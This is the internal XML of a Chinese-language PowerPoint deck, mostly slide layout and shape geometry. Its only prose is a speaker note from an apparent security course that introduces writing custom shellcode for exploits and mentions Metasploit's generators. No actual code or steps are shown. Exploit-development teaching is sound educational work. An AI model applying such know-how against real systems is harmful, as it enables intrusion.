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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId42"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId43"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="9228" r:id="rId2"/>
    <p:sldId id="9234" r:id="rId3"/>
    <p:sldId id="9399" r:id="rId4"/>
    <p:sldId id="9400" r:id="rId5"/>
    <p:sldId id="9232" r:id="rId6"/>
    <p:sldId id="9412" r:id="rId7"/>
    <p:sldId id="9433" r:id="rId8"/>
    <p:sldId id="9414" r:id="rId9"/>
    <p:sldId id="9416" r:id="rId10"/>
    <p:sldId id="9417" r:id="rId11"/>
    <p:sldId id="9418" r:id="rId12"/>
    <p:sldId id="9419" r:id="rId13"/>
    <p:sldId id="9415" r:id="rId14"/>
    <p:sldId id="9420" r:id="rId15"/>
    <p:sldId id="9401" r:id="rId16"/>
    <p:sldId id="9403" r:id="rId17"/>
    <p:sldId id="9404" r:id="rId18"/>
    <p:sldId id="9230" r:id="rId19"/>
    <p:sldId id="9406" r:id="rId20"/>
    <p:sldId id="9421" r:id="rId21"/>
    <p:sldId id="9422" r:id="rId22"/>
    <p:sldId id="9407" r:id="rId23"/>
    <p:sldId id="9237" r:id="rId24"/>
    <p:sldId id="9238" r:id="rId25"/>
    <p:sldId id="9318" r:id="rId26"/>
    <p:sldId id="9408" r:id="rId27"/>
    <p:sldId id="9409" r:id="rId28"/>
    <p:sldId id="9229" r:id="rId29"/>
    <p:sldId id="9218" r:id="rId30"/>
    <p:sldId id="9410" r:id="rId31"/>
    <p:sldId id="9231" r:id="rId32"/>
    <p:sldId id="9434" r:id="rId33"/>
    <p:sldId id="9423" r:id="rId34"/>
    <p:sldId id="9424" r:id="rId35"/>
    <p:sldId id="9425" r:id="rId36"/>
    <p:sldId id="9426" r:id="rId37"/>
    <p:sldId id="9427" r:id="rId38"/>
    <p:sldId id="9429" r:id="rId39"/>
    <p:sldId id="9430" r:id="rId40"/>
    <p:sldId id="9431" r:id="rId41"/>
  </p:sldIdLst>
  <p:sldSz cx="12858750" cy="7232650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId44"/>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50A3"/>
    <a:srgbClr val="1092F1"/>
    <a:srgbClr val="007DFA"/>
    <a:srgbClr val="969696"/>
    <a:srgbClr val="2278F4"/>
    <a:srgbClr val="FF3B5E"/>
    <a:srgbClr val="18A6FF"/>
    <a:srgbClr val="F2F2F2"/>
    <a:srgbClr val="4B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33" autoAdjust="0"/>
    <p:restoredTop sz="86691" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="1102" y="29"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="328"/>
        <p:guide pos="4050"/>
        <p:guide pos="557"/>
        <p:guide orient="horz" pos="4183"/>
        <p:guide pos="7497"/>
        <p:guide pos="6908"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>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7" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="283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2022/2/9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2022/2/9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71290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299311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650854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3079546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3968074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41969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2286043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3439481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831278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1331736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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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479591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2378327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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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32716228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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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39697724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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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36603717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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33355181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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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25130780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val="8191645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42270499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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一般来说漏洞的发现者在漏洞发现之初并不会给出完整的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，因此，如果我们想要掌握这个漏洞的利用，那就必须自己来写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，所以学会编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的技术就显得尤为重要了。由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>必须以机器码的形式存在，因此，如何得到机器代码是一个关键技术。除了后面要讲述的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>框架提供了自动生成常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代码之外，通常要根据自己的需要自行编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>简单的编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的步骤如下：</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2765032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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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28132357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val="2875486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14144358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ct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25102672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37612873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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42411199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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38629223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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1411426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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40976324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val="38687888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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8073282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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26826608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39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2524736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41617506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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1866030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420367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1308432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351376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1249291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949526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6B58CA9C-A61B-4218-B89C-765C4AE4CBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12858243" cy="7232650"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="11520489" cy="6480175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE98536-CFB6-41B1-A838-44066568C945}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="71612" y="71736"/>
              <a:ext cx="11377264" cy="6336703"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="65000"/>
                </a:sysClr>
              </a:solid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任意多边形: 形状 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBBE4815-B6B0-4394-BC94-8AAD066B124D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="275597" y="-275598"/>
              <a:ext cx="1403883" cy="1955080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1573594 h 1955080"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 1955080 h 1955080"/>
                <a:gd name="connsiteX2" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 1859708 h 1955080"/>
                <a:gd name="connsiteX3" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX4" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX5" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX6" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX7" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX8" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX9" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX10" fmla="*/ 1022396 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX11" fmla="*/ 1022395 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX12" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX13" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1573594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0" y="1573594"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403883" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022396" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022395" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1573594"/>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8" name="任意多边形: 形状 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B1F7C7-679E-4D38-A62B-40F1A8E86F21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="9843121" y="4802808"/>
              <a:ext cx="1403883" cy="1950851"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1950851 h 1950851"/>
                <a:gd name="connsiteX1" fmla="*/ 1022396 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 1950851 h 1950851"/>
                <a:gd name="connsiteX2" fmla="*/ 1022395 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 1950850 h 1950851"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 1950850 h 1950851"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 1903165 h 1950851"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1903165 h 1950851"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 381486 h 1950851"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 234161 h 1950851"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1950851"/>
                <a:gd name="connsiteX9" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 95372 h 1950851"/>
                <a:gd name="connsiteX10" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 234161 h 1950851"/>
                <a:gd name="connsiteX11" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 476858 h 1950851"/>
                <a:gd name="connsiteX12" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1855479 h 1950851"/>
                <a:gd name="connsiteX13" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 1855479 h 1950851"/>
                <a:gd name="connsiteX14" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 1855480 h 1950851"/>
                <a:gd name="connsiteX15" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1855480 h 195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0851">
                  <a:moveTo>
                    <a:pt x="1403883" y="1950851"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1022396" y="1950851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022395" y="1950850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1950850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1903165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1903165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="234161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="234161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="476858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1855479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1855479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1855480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="1855480"/>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9" name="任意多边形: 形状 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C32D3D-90D7-4CB2-BA03-C77D89B0E7E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9840777" y="-275599"/>
              <a:ext cx="1403883" cy="1955081"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1716692 h 1955081"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 47687 h 1955081"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 47687 h 1955081"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 1955081"/>
                <a:gd name="connsiteX4" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1955081"/>
                <a:gd name="connsiteX5" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 1955081"/>
                <a:gd name="connsiteX6" fmla="*/ 1403883 w 1403883"/>
